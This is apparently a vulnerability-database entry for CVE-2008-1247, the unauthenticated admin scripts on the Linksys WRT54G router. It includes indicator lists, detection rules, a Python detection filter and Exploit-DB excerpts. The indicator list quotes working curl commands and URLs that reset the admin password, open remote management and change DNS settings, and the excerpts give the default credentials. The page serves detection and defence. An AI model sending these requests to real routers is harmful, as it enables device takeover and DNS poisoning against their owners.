CVE-2008-1247
Published 2008-03-10
Priority P356 · critical · CVSS 2.0 score 10 (vector AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit available · EPSS 5.16% (91.4th percentile)
The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202.
Detection & IOCs (extracted from sources)
- command: curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http://192.168.1.1/manage.tri
- command: curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=1&http_wanport=31337&upnp_enable=1&layout=en" http://192.168.1.1/manage.tri
- url: http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en
- url: http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en
- Detect unauthenticated POST requests to any .tri script on the Linksys WRT54G web interface (port 80); absence of a valid Authorization header combined with a POST to paths matching /*.tri is a strong exploitation indicator.
- Monitor HTTP traffic for POST requests containing 'FactoryDefaults=Yes' targeting /factdefa.tri, indicating an attempt to reset the router to factory defaults.
- Alert on POST requests to /manage.tri containing 'PasswdModify=1' and 'remote_management=1', indicating an attempt to change the admin password and enable remote management.
- Detect POST requests to /Basic.tri containing dns0_0/dns1_0/dns2_0 parameters with non-zero values, indicating DNS poisoning attempts against the router.
- The exploit can be delivered as a drive-by via a malicious web page using hidden HTML forms and JavaScript (document.f.submit()), causing a victim's browser to POST to 192.168.1.1. Monitor for cross-origin POST requests to 192.168.1.1 from browser traffic.
- The default Authorization header value 'Basic OmFkbWlu' (base64 for ':admin') may appear in exploit traffic; alert on this specific header value in HTTP requests to router management interfaces.
- The vulnerability only affects Linksys WRT54G routers running firmware version 1.00.9 specifically.
- The attack relies on the router retaining its default LAN IP address of 192.168.1.1; changing this address breaks the drive-by cross-site attack vector.
- All exploit POST requests require the exact full set of parameters; missing any single parameter causes the exploit to fail and no configuration change occurs.
- GET requests to the .tri scripts do nothing; only POST requests trigger configuration changes, so detection must focus on the POST method.
- The Security.tri script is excluded from CVE-2008-1247 as it is already covered under CVE-2006-5202.
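The indicators above, turned into a small detection filter as an added example that is not part of this record or the exploit author's material. It reads constructed, tab-separated request records (method, target, Authorization value or '-', body), a format assumed here for illustration rather than any real device or proxy log, and reports which of the listed indicators each request triggers.

```python
from urllib.parse import urlsplit, parse_qs

def parse_request(line):
    """Parse one constructed record: METHOD<TAB>TARGET<TAB>AUTH<TAB>BODY.
    AUTH is '-' when the request carried no Authorization header."""
    method, target, auth, body = line.split("\t")
    url = urlsplit(target)
    params = parse_qs(url.query)     # .tri scripts take parameters in the
    params.update(parse_qs(body))    # query string or the POST body
    return method, url.path, (None if auth == "-" else auth), params

def has(params, key, value):
    return value in params.get(key, [])

def detect(line):
    """Return the indicator names triggered by one request, in rule order."""
    method, path, auth, p = parse_request(line)
    alerts = []
    # Only POSTs to .tri scripts change configuration; GETs are ignored.
    if method != "POST" or not path.lower().endswith(".tri"):
        return alerts
    if auth is None:
        alerts.append("unauthenticated-tri-post")
    if auth == "Basic OmFkbWlu":          # base64(':admin'), the default login
        alerts.append("default-credentials")
    if path == "/factdefa.tri" and has(p, "FactoryDefaults", "Yes"):
        alerts.append("factory-reset")
    if path == "/manage.tri" and has(p, "PasswdModify", "1") \
            and has(p, "remote_management", "1"):
        alerts.append("password-change-plus-remote-mgmt")
    if path == "/Basic.tri" and any(p.get(k, ["0"])[0] != "0"
                                    for k in ("dns0_0", "dns1_0", "dns2_0")):
        alerts.append("dns-change")
    return alerts

# Constructed sample records; the last Authorization value is base64('user:secret').
SAMPLE_LOG = [
    "POST\t/manage.tri\t-\tPasswdModify=1&http_passwd=x&http_passwdConfirm=x&remote_management=1&http_wanport=31337",
    "POST\t/factdefa.tri\tBasic OmFkbWlu\tFactoryDefaults=Yes",
    "POST\t/Basic.tri\t-\tdns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=0&dns2_0=0",
    "GET\t/Basic.tri?dns0_0=1\t-\t",
    "POST\t/index.asp\tBasic dXNlcjpzZWNyZXQ=\tlayout=en",
]

def scan(lines=SAMPLE_LOG):
    """Map record index -> triggered indicators, omitting clean records."""
    results = {i: detect(l) for i, l in enumerate(lines)}
    return {i: a for i, a in results.items() if a}

if __name__ == "__main__":
    for idx, alerts in scan().items():
        print(idx, alerts)
```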
No detection rules found.
Exploit-DB
Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)
exploitdb · 2008-06-24 · CVSS 5.0 · CVE-2006-5202 [MEDIUM]
---
<><> Hacking the Linksys WRT54G #2
<><> https://kinqpinz.info/
<><> by meathive
<><> root at kinqpinz.info && kinqpinz.info at gmail.com
++| CVE-2008-1247
The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials
when invoking scripts, which allows remote attackers to perform arbitrary
Exploit-DB
Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)
exploitdb · 2008-03-26 · CVSS 10.0 · CVE-2008-1247 [CRITICAL]
---
regurgitated by: meathive
url: kinqpinz.info ;]
Tue, 05 Feb 2008 07:51:41 -0700
############################################################################
CVE-2008-1247
WRT54G firmware version: v1.00.9
Default LAN IP: 192.168.1.1
Default auth: user:blank - pass:admin
Authorization: Basic OmFkbWlu
php > print base64_decode("OmFkbWlu");
:admin
https://kinqpinz.info/lib/wrt54g/
Refer to the above URL for demonstrations!
The official CVE -- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 -- entry for these vulnerabilities confirms that although the complexity of these attacks is low, their impact is extremely high.
############################################################################
/******************************
* No Aut
No writeups or analysis indexed.
References
- http://kinqpinz.info/lib/wrt54g/own.txt
- http://secunia.com/advisories/29344
- http://www.gnucitizen.org/projects/router-hacking-challenge/
- http://www.securityfocus.com/archive/1/489009/100/0/threaded
- http://www.securityfocus.com/bid/28381
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41118
- https://kinqpinz.info/lib/wrt54g/
- https://kinqpinz.info/lib/wrt54g/own2.txt
- https://www.exploit-db.com/exploits/5313
- https://www.exploit-db.com/exploits/5926